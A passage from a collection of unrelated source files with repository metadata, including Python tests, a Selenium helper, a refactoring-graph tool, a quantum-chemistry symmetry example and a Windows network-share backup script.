if __name__ == '__main__':
unittest.main()
| [
"sami@samione.fi"
] | sami@samione.fi |
c3fb52338d0eb222f32a5c0a4ccc7b24665e94d7 | dd59bef82ea0ed2f6e3302b132af17ea5b1ad587 | /python/name_your_python.py | bfec3d8829593c16013447f4e8d32b18b7ca23d1 | [] | no_license | Alex1100/codewars | 1a72ec63abd8c277cbb396130aaed0150e78d824 | a3c4d0c558722dfde11b07cda8d23d6e7974ee2b | refs/heads/master | 2021-01-23T18:00:31.445860 | 2018-05-08T06:16:19 | 2018-05-08T06:16:19 | 82,992,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | class Python:
def __init__(self, name):
self.name = name
#tests
import inspect
test.describe('Python class')
test.it('should be a class')
test.expect(inspect.isclass(Python), 'Python should be a class')
test.it('should support name')
bubba = Python('Bubba')
stripes = Python('stripes')
test.expect(bubba.name == 'Bubba', 'Expected Python.name to return "Bubba"')
test.expect(stripes.name == 'stripes')
| [
"aleksanyanalek@gmail.com"
] | aleksanyanalek@gmail.com |
c0b996cdf9b420a9d590aff9c70c65902136643f | af2bcc0f22e6e9fb67f68b700287c21214de2bb0 | /jack/search_indexes.py | 9a64224de68c3b4ce95c4ec02391dc16fe8ae096 | [] | no_license | dcl67/Loanshark2 | 8bb6c2fb6d38f548dcd19ed7f4250f285800e44f | 8d00f2aa2217d8d5ae9550167e9501d60e47f81b | refs/heads/master | 2020-03-30T18:14:10.235263 | 2018-10-09T23:14:06 | 2018-10-09T23:14:06 | 151,490,176 | 0 | 0 | null | 2018-10-09T23:14:07 | 2018-10-03T22:46:31 | Python | UTF-8 | Python | false | false | 304 | py | from haystack import indexes
from .models import JackInfo
class JackIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return JackInfo
def index_queryset(self, using=None):
return self.get_model().objects.all() | [
"dannylopez@n2-100-169.dhcp.drexel.edu"
] | dannylopez@n2-100-169.dhcp.drexel.edu |
fdd6ebafb9be40b63dea4e74e8691392ee0c5932 | 762e5ede903a595eb0b3e382387e26c45b836e08 | /fixture/group.py | 2cec60d01592bb63503c189ea3572970d37ffc54 | [
"Apache-2.0"
] | permissive | ivanSchistov/Python_tranings_new | ec8cff24b9f91beedb54ee935f21081fdfacf3c7 | d10094157915bae65143de9b086bbc594927780f | refs/heads/master | 2020-04-06T07:10:11.672753 | 2016-08-30T13:59:06 | 2016-08-30T13:59:06 | 63,578,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,228 | py | __author__ = 'ichistov'
from model.group import Group
class GroupHelper:
def __init__(self, app):
self.app = app
def open_group_page(self):
driver = self.app.driver
if not (driver.current_url.endswitch("/group.php") and len(driver.find_elements_by_name("new")) > 0):
driver.find_element_by_link_text("groups").click()
def change_field_value(self, field_name, text):
driver = self.app.driver
if text is not None:
driver.find_element_by_name(field_name).click()
driver.find_element_by_name(field_name).clear()
driver.find_element_by_name(field_name).send_keys(text)
def fill_group_form(self, group):
driver = self.app.driver
self.change_field_value("group_name", group.name)
self.change_field_value("group_header", group.header)
self.change_field_value("group_footer", group.footer)
def create(self, group):
driver = self.app.driver
self.open_group_page()
# create new group
driver.find_element_by_xpath("(//input[@name='new'])[2]").click()
self.fill_group_form(group)
driver.find_element_by_name("submit").click()
self.return_group_page()
self.group_cache = None
def select_first_group(self):
driver = self.app.driver
driver.find_element_by_name("selected[]").click()
def select_group_by_index(self, index):
driver = self.app.driver
driver.find_elements_by_name("selected[]")[index].click()
def mofify_first_group(self):
self.modify_group_by_index(0)
def modify_group_by_index(self, index, new_group_data):
driver = self.app.driver
self.open_group_page()
self.select_group_by_index(index)
# submit edit group
driver.find_element_by_name("edit").click()
# change group name and click update
self.fill_group_form(new_group_data)
driver.find_element_by_name("update").click()
self.return_group_page()
self.group_cache = None
def delete_first_group(self):
self.delete_group_by_index(0)
def delete_group_by_index(self, index):
driver = self.app.driver
self.open_group_page()
self.select_group_by_index(index)
# submit deletion
driver.find_element_by_name("delete").click()
self.return_group_page()
self.group_cache = None
def return_group_page(self):
driver = self.app.driver
driver.find_element_by_link_text("group page").click()
def count(self):
driver = self.app.driver
self.open_group_page()
return len(driver.find_elements_by_name("selected[]"))
group_cache = None
def get_group_list(self):
if self.group_cache is None:
driver = self.app.driver
self.open_group_page()
self.group_cache = []
for element in driver.find_elements_by_css_selector("span.group"):
text = element.get_text()
id = element.find_element_by_name("selected[]").get_attribute("value")
self.group_cache.append(Group(name=text, id=id))
return list(self.group_cache)
| [
"ivan.s.chistov@gmail.com"
] | ivan.s.chistov@gmail.com |
9d7664af768702a3da5d5567e409f84faf975d8a | 4380a4029bac26f205ed925026914dce9e96fff0 | /slyr/parser/exceptions.py | d791f4c9f6a447c4501d075e561829ba69832613 | [] | no_license | deepVector/slyr | 6b327f835994c8f20f0614eb6c772b90aa2d8536 | 5d532ac3eec0e00c5883bf873d30c6b18a4edf30 | refs/heads/master | 2020-12-03T10:24:39.660904 | 2019-04-08T00:48:03 | 2019-04-08T00:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | #!/usr/bin/env python
"""
SLYR Exceptions
"""
class UnsupportedVersionException(Exception):
    """Raised when an object of an unsupported version is encountered."""
class UnreadableSymbolException(Exception):
    """Raised when a symbol could not be read, for whatever reason."""
class NotImplementedException(Exception):
    """Raised when reading/converting an object that is known but not yet
    implemented."""
class UnknownGuidException(Exception):
    """Raised on encountering an unknown GUID."""
class InvalidColorException(Exception):
    """Raised when an error was encountered while converting a color."""
class UnknownPictureTypeException(Exception):
    """Raised on encountering an unknown picture type."""
class UnreadablePictureException(Exception):
    """Raised on encountering an unreadable picture."""
| [
"nyall.dawson@gmail.com"
] | nyall.dawson@gmail.com |
cb2bce0bbe64aa31b807cf4de4f50ad72fa3a354 | ed6fd5b045d1d58ea0ecc3ae8c2275baad5e9ac0 | /BTTL/Nhập xuất dữ liệu/ifElseStatement.py | 7b9f863fd92e4692bdc87991dcd9dc816a95b93c | [] | no_license | huanyd1/BTL-Python | da5e2253d7c0c1ff16478ac587d2e0eebd089528 | 98313889762b2954542af49676337027ee7bbca1 | refs/heads/main | 2023-06-21T10:48:01.041207 | 2021-07-17T04:05:42 | 2021-07-17T04:05:42 | 386,830,361 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,334 | py | # import math
# #Nhập vào một số nguyên n, in ra màn hình giá trị tuyệt đối của n.
# n = int(input("Nhập vào số nguyên n: "))
# print("Giá trị tuyệt đối của",n,"là: ",abs(n))
# #Nhập vào một số nguyên n, kiểm tra n có phải số chẵn không, in ra "YES" hoặc "NO" tương ứng.
# n = int(input("Nhập vào số nguyên n: "))
# if(n % 2 == 0):
# print("YES")
# else:
# print("NO")
# #Nhập vào số x, in ra màn hình căn bậc 2 của x nếu x >= 0, nếu không thì báo lỗi "Số âm không có căn bậc 2."
# x = float(input("Nhập vào số nguyên x: "))
# if(0 <= x):
# print("Căn bậc hai của x là: ",math.sqrt(x))
# else:
# print("Số âm không có căn bậc 2")
# #Nhập vào số tự nhiên n, kiểm tra xem n có phải số chẵn có số chữ số khác 2 hay không.
# n = int(input("Nhập vào số tự nhiên n :"))
# if(n % 2 == 0 and n != 2):
# print("YES")
# else:
# print("NO")
# #2. Nhập vào 3 số, kiểm tra xem 3 số có phải 3 cạnh của một tam giác không.
# a = int(input("Nhập vào cạnh thứ nhất của tam giác: "))
# b = int(input("Nhập vào cạnh thứ hai của tam giác: "))
# c = int(input("Nhập vào cạnh thứ ba của tam giác: "))
# if(a + b > c or a + c > b or b + c > a):
# print("YES")
# else:
# print("NO")
# #3*. Nhập vào số tự nhiên y. Kiểm tra xem năm y có phải là năm nhuận không.
# y = int(input("Nhập vào năm cần kiểm tra: "))
# if(y % 400):
# print("Năm ",y,"là năm nhuận")
# else:
# print("Năm ",y,"không phải là năm nhuận")
# #4*. Nhập vào 3 số, kiểm tra xem 3 số có phải 3 cạnh của một tam giác không. Nếu có, kiểm tra xem tam giác đó là tam giác vuông, tam giác nhọn hay tam giác tù.
# a = int(input("Nhập vào số thứ nhất : "))
# b = int(input("Nhập vào số thứ hai : "))
# c = int(input("Nhập vào số thứ ba : "))
# if(a + b > c or a + c > b or b + c > a):
# if(a * a == b * b + c * c or b * b == a * a + c * c or c * c == b * b + a * a ):
# print("Đây là ba cạnh của tam giác vuông")
# elif(a * a > b * b + c * c or b * b > a * a + c * c or c * c > b * b + a * a):
# print("Đây là ba cạnh của tam giác tù")
# else:
# print("Đây là ba cạnh của tam giác nhọn")
# else:
# print("Đây không phải ba cạnh của một tam giác")
#Nhập vào 3 số tự nhiên, in ra màn hình số lớn nhất trong 3 số đó.
# a = int(input("Nhập vào số tự nhiên thứ nhất: "))
# b = int(input("Nhập vào số tự nhiên thứ hai: "))
# c = int(input("Nhập vào số tự nhiên thứ ba: "))
# if(a > b > c or a > c > b):
# print("Số thứ nhất: ",a,",lớn nhất trong ba số")
# elif(b > a > c or b > c > a):
# print("Số thứ hai: ",b,",lớn nhất trong ba số")
# else:
# print("Số thứ ba: ",c,",lớn nhất trong ba số")
#2*. Nhập vào 6 số tự nhiên, in ra màn hình số lớn nhất trong 6 số đó.
print("Nhập vào 6 số không trùng")
a = int(input("Nhập vào số tự nhiên thứ nhất: "))
b = int(input("Nhập vào số tự nhiên thứ hai: "))
c = int(input("Nhập vào số tự nhiên thứ ba: "))
d = int(input("Nhập vào số tự nhiên thứ tư: "))
e = int(input("Nhập vào số tự nhiên thứ năm: "))
f = int(input("Nhập vào số tự nhiên thứ sáu: "))
# Largest value of each input pair.
capLonThuNhat = max(a, b)
capLonThuHai = max(c, d)
capLonThuBa = max(e, f)
# Fix: the original chained comparisons (x > y > z) missed ties between the
# pair maxima (e.g. max(a,b) == max(c,d) > max(e,f)) and then fell through to
# the else-branch, printing a non-maximal value. max() covers every case.
print("Số lớn nhất trong 6 số là: ", max(capLonThuNhat, capLonThuHai, capLonThuBa))
"huanyd1@gmail.com"
] | huanyd1@gmail.com |
ea529a61f7d89c379b834025a2a53b4e941fd15c | 163ddf7b80885d46beb346ca91417f66a860f90c | /designs/rtl/sigma/sw/benchmarks/riscv64-unknown-elf-gcc/riscv64-unknown-elf/lib/rv64imf/lp64f/libstdc++.a-gdb.py | 4ebe214cb8995f8e6bb63ea5a530eb9450bfad9d | [] | no_license | VladislavProzhirko/activcore_sobel | 0555cc5de3b2b39f0e3957fa85e5a742f6824fce | 1c0f7c91cef71dc93e7bd0bb5b19150b09147ef6 | refs/heads/master | 2023-02-03T17:10:22.794053 | 2020-12-26T18:12:46 | 2020-12-26T18:12:46 | 321,976,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | # -*- python -*-
# Copyright (C) 2009-2018 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--toolchain-only-package--scratch-carsteng/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-8.3.0-2020.04.0-x86_64-w64-mingw32/share/gcc-8.3.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--toolchain-only-package--scratch-carsteng/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-8.3.0-2020.04.0-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv64imf/lp64f'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"psvnetwork@mail.ru"
] | psvnetwork@mail.ru |
7fe00db7ad1eccd3c1f2ccac963a2a36d13d2cb9 | 06e15934a144fb14f47e85de7cd0097d16f0b542 | /admin/__init__.py | 01b4c0e9dd88877af2bdc9e2bb81ae507b1bfc31 | [] | no_license | sclzzhanghaijun/django-cms | b79649129c1810259da6525121e0a597a61ac37b | ccb5363703d47f7bb721fdd12d8b8f7f84c8a220 | refs/heads/master | 2021-06-24T03:48:52.485657 | 2020-05-06T07:59:51 | 2020-05-06T07:59:51 | 144,838,184 | 3 | 1 | null | 2021-06-10T20:44:25 | 2018-08-15T10:14:07 | Python | UTF-8 | Python | false | false | 31 | py | def error():
print('aaaa')
| [
"7192185@qq.com"
] | 7192185@qq.com |
49b3159a4b3be217496c5e1eaf768b6e8d6405a1 | 0df3df2ae232aedcb64b49dd127c18655dc89089 | /PyCopyBackUp.py | 6b91b73b6e14d5fad6f1733856a3c1ff42108e98 | [] | no_license | jii/PyBackUp | 6e73b6479b5af8703943a10d914296124960eb78 | a9e60c20afe1daf42cdb51b40c8bbab047ce60e5 | refs/heads/main | 2023-06-30T07:59:32.187701 | 2021-08-09T06:50:03 | 2021-08-09T06:50:03 | 394,178,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | # -*- coding: utf-8 -*-
# zalohovaci software by jii 23.09.2020
#http://ip/backupadd/?cmd=cmd test&log=log test&pc=pc test
# jméno PC nesmí mít mezeru
# https://www.geeksforgeeks.org/working-zip-files-python/
# přidej zipovaní
import os, shutil, sys
from datetime import datetime
import urllib.request
# Local source folder scanned for files to move (note: no trailing separator).
path = "backupFolder"
# UNC destination root; a weekday subfolder name is appended at runtime.
moveto = "//ip/zalohaPohoda/zalohaSklad/"
from contextlib import contextmanager
@contextmanager
def network_share_auth(share, username=None, password=None, drive_letter='P'):
    """Context manager that mounts the given share using the given
    username and password to the given drive letter when entering
    the context and unmounts it when exiting."""
    # NOTE(review): the NET USE command line is built by string joining and
    # passes the password as a plain argument — it is visible in the process
    # list and injectable if share/username/password ever come from untrusted
    # input. Consider subprocess.run([...]) with a list argument instead.
    cmd_parts = ["NET USE %s: %s" % (drive_letter, share)]
    if password:
        cmd_parts.append(password)
    if username:
        cmd_parts.append("/USER:%s" % username)
    os.system(" ".join(cmd_parts))
    try:
        yield
    finally:
        # Always unmount, even when the with-body raised.
        os.system("NET USE %s: /DELETE" % drive_letter)
# Weekday routing: each weekday maps to a Czech folder name; nothing runs on
# weekends. The weekday is read once so it cannot change between the checks.
weekday = datetime.today().strftime('%A')
if weekday == "Monday":
    dnes = "pondeli"
elif weekday == "Tuesday":
    dnes = "utery"
elif weekday == "Wednesday":
    dnes = "streda"
elif weekday == "Thursday":
    dnes = "ctvrtek"
elif weekday == "Friday":
    dnes = "patek"
else:
    # Saturday/Sunday (or an unexpected locale name): no backup today.
    sys.exit()
moveto = moveto + dnes+"/"
files = os.listdir(path)
files.sort()
fx = open("BackUp.log", "a")
now = datetime.now()  # start timestamp, reused for every log line of this run
fx.write("Run "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
urllib.request.urlopen("http://ip/backupadd/?cmd=Run&log=Spusteni&pc=ServerPohodaSklad")
for f in files:
    # Fix: the original used `path+f`, which produced "backupFolder<name>"
    # with no separator; join with the platform path separator instead.
    src = os.path.join(path, f)
    dst = moveto+f
    with network_share_auth(r"\\server\folder", "login", "pass"):
        shutil.move(src,dst)
    fx.write("Presunoto "+src+" do "+dst+" v "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
    print("Presunoto "+src+" do "+dst+" v "+now.strftime("%H:%M:%S - %m/%d/%y"))
    url = "http://ip/backupadd/?cmd="+dst.replace(' ', '_')+"&log=Presun&pc=ServerPohodaSklad"
    print(url)
    urllib.request.urlopen(url)
fx.write("Konec "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
urllib.request.urlopen("http://ip/backupadd/?cmd=End&log=Konec&pc=ServerPohodaSklad")
fx.close()
"noreply@github.com"
] | jii.noreply@github.com |
52948e1594c44104fe0b77dd9b986ea916addc53 | 46e56801e5fa9ed960005a0e0c2e23e9b4f87d61 | /python-example/ex2-6.py | c83764baaefc59639b1aef005df33dc72cd6c40d | [] | no_license | ZhenyingZhu/StudyNotes | 96a16e9e176d1bcfb8838fa798e446a2a23ae06d | 4c7a32cc707590fb632625b43ddc853c4630d445 | refs/heads/master | 2023-08-17T17:07:22.176903 | 2023-08-17T00:59:03 | 2023-08-17T00:59:03 | 31,193,263 | 5 | 3 | null | 2023-03-03T16:18:45 | 2015-02-23T03:57:22 | Python | UTF-8 | Python | false | false | 170 | py | #! /usr/bin/env python
input = raw_input('input what you want: ')
if int(input) < 0:
print 'input is a negative number'
else:
print 'input is a positice number'
| [
"zz2283@columbia.edu"
] | zz2283@columbia.edu |
51714d06f248bcb4b6e6ccd78bed5887d7d83bf1 | ed85cd8d3c938a07d1fa322bc9fb9394523d24b2 | /scripts/refgraph.py | b2d243ca248ce53f1b65a73b187e2c675d8a5501 | [] | no_license | alinebrito/refactoring-graph-generator | 227dce0ae5907c48383dd01f7493ae832d3740bb | 81f7900c393a70554b276414e788528b6abfb3cd | refs/heads/main | 2023-06-06T01:33:16.201595 | 2021-06-30T17:38:45 | 2021-06-30T17:38:45 | 367,390,540 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,254 | py | import sys
import subprocess
import os
import json
import pandas as pd
import networkx as nx
import io
from graphviz import Digraph
from scripts.catalog import Catalog
class RefactoringGraph:
    """Builds refactoring graphs from RefactoringMiner-style CSV data,
    splits them into connected subgraphs, and renders them with graphviz.

    Nodes are program entities (before/after full names); each directed edge
    between two nodes carries the list of refactorings applied between them.
    """

    def extract_graph(self, language, refactorings):
        """Build node/edge dictionaries from a refactorings DataFrame.

        Returns {'nodes': {entity_name: node_id},
                 'edges': {'<beforeId>_<afterId>': [refactoring_dict, ...]}}.
        """
        node_id = 0
        edge_id = 0
        nodes = {}
        edges = {}
        for index, ref in refactorings.iterrows():
            entity_before = ref.get('entityBeforeFullName')
            entity_after = ref.get('entityAfterFullName')
            if entity_before not in nodes:
                nodes[entity_before] = node_id
                node_id += 1
            if entity_after not in nodes:
                nodes[entity_after] = node_id
                node_id += 1
            # Edge properties: copy every CSV column plus derived ids.
            edge = {}
            for key in ref.keys():
                edge[key] = ref.get(key)
            edge['nodeBeforeId'] = nodes.get(entity_before)
            edge['nodeAfterId'] = nodes.get(entity_after)
            edge['edgeId'] = edge_id
            edge['refactoringCode'] = Catalog.operations(language).get(ref.get('refactoringType'))
            edge_key = '{}_{}'.format(edge.get('nodeBeforeId'), edge.get('nodeAfterId'))
            if edge_key not in edges:
                edges[edge_key] = []  # initialize a new edge
            edges[edge_key].append(edge)  # append this refactoring to the edge
            edge_id += 1
        return {'nodes': nodes, 'edges': edges}

    def create_digraph(self, data):
        """Create a networkx DiGraph from extract_graph() output."""
        DG = nx.DiGraph()
        for entity in data['nodes']:
            DG.add_node(data['nodes'][entity])
        for key in data['edges']:
            for edge in data['edges'][key]:
                DG.add_edge(edge['nodeBeforeId'], edge['nodeAfterId'])
        return {'digraph': DG}

    def get_edges_by_nodes(self, node_number_1, node_number_2, graph_data):
        """Return the directed edge lists between two nodes (both directions)."""
        edges = graph_data['edges']
        edges_selected = []
        edge_key_1 = '{}_{}'.format(node_number_1, node_number_2)
        edge_key_2 = '{}_{}'.format(node_number_2, node_number_1)
        if edge_key_1 in edges:
            edges_selected.append(edges[edge_key_1])
        # Second key only when distinct, so a self-loop is not added twice.
        if (edge_key_2 in edges) and (edge_key_1 != edge_key_2):
            edges_selected.append(edges[edge_key_2])
        return {'edges': edges_selected}

    def extract_subgraphs(self, project, digraph, graph_data):
        """Split the digraph into weakly-connected subgraph dictionaries."""
        directed_subgraphs = []
        UG = digraph.to_undirected()
        # Fix: nx.connected_component_subgraphs() was removed in networkx 2.4;
        # iterate connected_components() and take subgraph views instead
        # (works on both old and new networkx versions).
        for i, component in enumerate(nx.connected_components(UG)):
            subgraph = UG.subgraph(component)
            directed_subgraph = {}
            directed_subgraph['id'] = i
            directed_subgraph['project'] = project
            directed_subgraph['nodes'] = list(subgraph.nodes())
            edges = []
            for node_number_1, node_number_2 in subgraph.edges():
                directed_edges = self.get_edges_by_nodes(node_number_1, node_number_2, graph_data)['edges']
                edges.extend(directed_edges)
            directed_subgraph['edges'] = edges
            directed_subgraphs.append(directed_subgraph)
        return {'directed_subgraphs': directed_subgraphs}

    def contains_different_commits(self, subgraph):
        """Return True when the subgraph's refactorings span >1 commit."""
        seen = set()  # set instead of list: O(1) membership checks
        for edge in subgraph['edges']:
            for refactoring in edge:
                commit = refactoring['commitHash']
                if seen and commit not in seen:
                    return True
                seen.add(commit)
        return False

    def split_supgraphs_atomic_and_overtime(self, subgraphs):
        """Label each subgraph 'atomic' (single commit) or 'overtime' and
        split them into two lists. Mutates the subgraph dicts in place."""
        subgraphs_same_commit = []
        subgraphs_different_commit = []
        for subgraph in subgraphs:
            if self.contains_different_commits(subgraph):
                subgraph['labelGroup'] = 'overtime'
                subgraphs_different_commit.append(subgraph)
            else:
                subgraph['labelGroup'] = 'atomic'
                subgraphs_same_commit.append(subgraph)
        return {'atomic': subgraphs_same_commit, 'overtime': subgraphs_different_commit}

    def write_json(self, file_json, path, file_name):
        """Serialize file_json to path/file_name; never overwrites a file."""
        if os.path.isfile(os.path.join(path, file_name)):
            # Deliberate: existing results are preserved, not clobbered.
            print('ERRO: File exists %s' % os.path.join(path, file_name))
        else:
            if not os.path.exists(path):
                os.makedirs(path)
            file = open(os.path.join(path, file_name), 'w+')
            print('Creating %s ' % os.path.join(path, file_name))
            json.dump(file_json, file)
            file.close()
        return

    def find_disconnected_subgraphs(self, project, language):
        """End-to-end pipeline: CSV -> graph -> subgraphs -> JSON results."""
        refactorings = pd.read_csv('dataset/{}/results/selected_refactorings.csv'.format(project), sep=';', keep_default_na=False)
        graph_data = self.extract_graph(language, refactorings)
        digraph = self.create_digraph(graph_data)['digraph']
        subgraphs = self.extract_subgraphs(project, digraph, graph_data)['directed_subgraphs']
        groups_subgraph = self.split_supgraphs_atomic_and_overtime(subgraphs)
        self.write_json(groups_subgraph.get('atomic'), 'dataset/{}/results'.format(project), 'atomic_subgraphs.json')
        self.write_json(groups_subgraph.get('overtime'), 'dataset/{}/results'.format(project), 'overtime_subgraphs.json')
        return

    def save_graph_to_html(self, project, diggraph, group, id):
        """Write a rendered graphviz Digraph to the project's view folder."""
        file_name = 'dataset/{}/results/view/{}_subgraph_{}.html'.format(project, group, id)
        print('Creating {}'.format(file_name))
        os.makedirs(os.path.dirname(file_name), exist_ok=True)
        with io.open(file_name, 'w', encoding='utf8') as f:
            f.write(diggraph.pipe().decode('utf-8'))
        return

    def plot(self, project, subgraphs, label_group):
        """Render each subgraph dictionary as an SVG-in-HTML file."""
        for subgraph in subgraphs:
            diggraph = Digraph(format='svg')
            diggraph.attr('node', shape='point', fixedsize='true', width='0.15')
            for edge in subgraph.get('edges'):
                for refactoring in edge:
                    diggraph.edge(refactoring.get('entityBeforeFullName'), refactoring.get('entityAfterFullName'), color='red', label=refactoring.get('refactoringType'), len='0.1')
            label_text = '\n\nRefactoring subgraph #{}'.format(subgraph.get('id'))
            diggraph.attr(bgcolor='gainsboro', label=label_text, fontcolor='black', rankdir='LR', ratio='auto', pad="0.5,0.5")
            self.save_graph_to_html(project, diggraph, label_group, subgraph.get('id'))
        return

    def plot_overtime_subgraphs(self, project):
        """Plot every subgraph stored in overtime_subgraphs.json."""
        file_name = 'dataset/{}/results/overtime_subgraphs.json'.format(project)
        with open(file_name) as json_file:
            subgraphs = json.load(json_file)
        self.plot(project, subgraphs, 'overtime')

    def plot_atomic_subgraphs(self, project):
        """Plot every subgraph stored in atomic_subgraphs.json."""
        file_name = 'dataset/{}/results/atomic_subgraphs.json'.format(project)
        with open(file_name) as json_file:
            subgraphs = json.load(json_file)
        self.plot(project, subgraphs, 'atomic')
"14023536+alinebrito@users.noreply.github.com"
] | 14023536+alinebrito@users.noreply.github.com |
bbf9c3db561c3a9339d630028112a6794a730e5e | db734d1c2fa1ff072c3bad3efbc80f5fb045647b | /examples/advanced_symmetry.py | 5b838beba33fb51eb88a5bfddea66a81e01fb2ff | [
"MIT"
] | permissive | yenchunlin024/PyQchem | ff4a0f9062124c3ef47dba5e7c48b372e4a99c21 | 2edf984ba17373ad3fd450b18592c8b7827b72e5 | refs/heads/master | 2023-08-12T09:43:46.942362 | 2021-09-30T10:59:35 | 2021-09-30T10:59:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,469 | py | import numpy as np
from pyqchem.symmetry import get_wf_symmetry
from pyqchem.utils import _set_zero_to_coefficients, get_plane, crop_electronic_structure
from pyqchem.qchem_core import get_output_from_qchem, create_qchem_input
from pyqchem.structure import Structure
from pyqchem.file_io import build_fchk
# Define custom classification function
def get_custom_orbital_classification(parsed_fchk,
                                      center=None,
                                      orientation=(0, 0, 1)):
    """Classify alpha orbitals by their behavior under the inversion operation.

    Returns a list of [label, |overlap|] pairs: ' YES' when the normalized
    self-overlap under inversion is non-negative, ' NOO' otherwise.
    """
    molsym = get_wf_symmetry(parsed_fchk['structure'],
                             parsed_fchk['basis'],
                             parsed_fchk['coefficients'],
                             center=center,
                             orientation=orientation)
    inversion_idx = molsym.SymLab.index('i')  # operation used to separate orbitals
    identity_idx = molsym.SymLab.index('E')
    labels = []
    for row, soev in enumerate(molsym.mo_SOEVs_a[:, inversion_idx]):
        normalized = soev / molsym.mo_SOEVs_a[row, identity_idx]  # normalize
        tag = ' NOO' if normalized < 0 else ' YES'
        labels.append([tag, np.abs(normalized)])
    return labels
# Ethylene dimer: two parallel molecules separated by 3.7 Angstrom along x.
dimer_ethene = [[0.0, 0.0000, 0.65750],
                [0.0, 0.0000, -0.65750],
                [0.0, 0.92281, 1.22792],
                [0.0, -0.92281, 1.22792],
                [0.0, -0.92281, -1.22792],
                [0.0, 0.92281, -1.22792],
                [3.7, 0.00000, 0.65750],
                [3.7, 0.00000, -0.65750],
                [3.7, 0.92281, 1.22792],
                [3.7, -0.92281, 1.22792],
                [3.7, -0.92281, -1.22792],
                [3.7, 0.92281, -1.22792]]

symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']

# Atom index ranges of the two monomer fragments.
range_f1 = range(0, 6)
range_f2 = range(6, 12)

# create molecule
molecule = Structure(coordinates=dimer_ethene,
                     symbols=symbols,
                     charge=0,
                     multiplicity=1)

# create Q-Chem input
qc_input = create_qchem_input(molecule,
                              jobtype='sp',
                              exchange='hf',
                              basis='6-31G')

print(qc_input.get_txt())

# get data from Q-Chem calculation
output, electronic_structure = get_output_from_qchem(qc_input,
                                                     processors=4,
                                                     force_recalculation=False,
                                                     read_fchk=True,
                                                     fchk_only=True)

# store original fchk info in file
open('test.fchk', 'w').write(build_fchk(electronic_structure))

# get symmetry classification
electronic_structure_f1 = crop_electronic_structure(electronic_structure, range_f1)

# save test fchk file with new coefficients
open('test_f1.fchk', 'w').write(build_fchk(electronic_structure_f1))

# get plane from coordinates
coordinates_f1 = electronic_structure['structure'].get_coordinates(fragment=range_f1)
center_f1, normal_f1 = get_plane(coordinates_f1)

# get classified orbitals
orbital_type_f1 = get_custom_orbital_classification(electronic_structure_f1,
                                                    center=center_f1,
                                                    orientation=normal_f1)

# get plane from coordinates
coordinates_f2 = electronic_structure['structure'].get_coordinates(fragment=range_f2)
center_f2, normal_f2 = get_plane(coordinates_f2)

electronic_structure_f2 = crop_electronic_structure(electronic_structure, range_f2)

# save test fchk file with new coefficients
open('test_f2.fchk', 'w').write(build_fchk(electronic_structure_f2))

# get classified orbitals
orbital_type_f2 = get_custom_orbital_classification(electronic_structure_f2,
                                                    center=center_f2,
                                                    orientation=normal_f2)

# range of orbitals to show (1-based orbital numbers)
frontier_orbitals = [12, 13, 14, 15, 16, 17, 18, 19, 20]

# Print results in table
print('Inversion center?')
print('index fragment 1 fragment 2')
for i in frontier_orbitals:
    print(' {:4} {:4} {:4.3f} {:4} {:4.3f}'.format(i,
                                                   orbital_type_f1[i-1][0], orbital_type_f1[i-1][1],
                                                   orbital_type_f2[i-1][0], orbital_type_f2[i-1][1]))
| [
"abelcarreras83@gmail.com"
] | abelcarreras83@gmail.com |
cc7027ec8852029b29739182b583c126f29a16cf | 4ab57a7bd592d267d180f0541ee18b4c544eec28 | /tests/orm/mixins/test_soft_deletes.py | bba8c0e6fcda1c345551add5b8b6bc09638e0e42 | [
"MIT"
